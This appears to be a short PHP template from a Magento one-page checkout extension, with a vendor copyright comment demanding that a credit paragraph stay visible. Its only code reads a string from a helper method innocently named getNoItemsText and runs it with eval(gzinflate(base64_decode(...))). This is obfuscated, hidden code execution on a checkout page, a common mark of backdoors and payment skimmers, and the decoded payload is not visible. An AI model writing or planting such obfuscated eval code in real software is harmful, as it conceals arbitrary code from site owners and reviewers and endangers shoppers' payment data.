<?php
$text	= Mage::helper('onepagecheckout')->getNoItemsText();
eval(gzinflate(base64_decode($text)));
?>
<!--	Copyright 2012 Interior Web Design - interiorwebdesign.com
		Released under the MIT license
		The following paragraph (p.iwdtrade) must not be removed, relocated, or hidden from view 
		using CSS, JS or any other method without written expressed permission from Interior Web Design -->

	